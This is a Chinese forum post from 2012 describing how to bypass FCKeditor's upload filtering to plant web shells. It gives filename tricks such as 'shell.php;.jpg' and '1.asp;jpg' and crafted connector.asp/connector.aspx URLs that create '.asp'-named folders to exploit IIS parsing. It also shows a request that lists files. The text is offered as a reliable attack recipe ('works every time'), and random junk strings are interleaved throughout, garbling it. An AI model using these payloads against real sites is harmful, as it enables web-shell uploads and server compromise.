很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg7 V5 F$ C- L: G. T3 |
6 ?4 ]9 k' y' O! W* L8 e1 u- c9 C. E
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。* H: y9 ~/ i( _" o
& s# @# D, C3 f$ O% d: c继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
5 {. p! Y+ a* N& X L# P/ V
I( l/ [/ L/ j/ q. |9 _突破建立文件夹:/ b& j) u8 e9 x
/ u2 L$ A$ i# ?! r v! Ueditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
- b( a/ Q& A9 m+ G( ^0 ?3 j: t
7 A2 W' m: [; p' i6 A参数:: v w# V' J) _+ S1 b5 w! y* A
2 c9 }8 i M8 o- E% J
当前目录名:CurrentFolder=/qing.asp
9 Z8 u5 h5 m% m2 O) k- R* F+ ~
* i, ]3 d7 ?3 x* w5 h9 L6 s; d新的目录名:NewFolderName=x.asp+ ?& N! ], [7 B. ]9 m* T3 M
6 s- C6 z3 B* y# j, Z* N$ v% K
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
- d9 K L& K; T8 }5 q4 x
+ X4 ^$ S. d5 _: ]那么 x.asp 就已经建立生成了,此方法百试百灵!8 l# F. J3 A5 c1 w$ T0 ^) j7 T" p: K
: W& f" |5 J- u新建文件夹参数 x.asp,基本都能搞定。, Z$ q6 b* l9 x0 y2 @
; z7 l- P6 X2 l X; W
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建% ^* w! K6 u; T* t% m
/ o z3 F A# K" H# c
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
6 L- U7 G# ]* [& E, ^8 M2 `! @% V. \# y$ e5 c4 R
获取文件列表 j% a, Y# {' f7 X9 t
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F1 I/ E, M, N9 I8 J" |
4 z3 `- T0 n) j4 o |
发表于 2012-12-31 09:27:09
收藏
支持
反对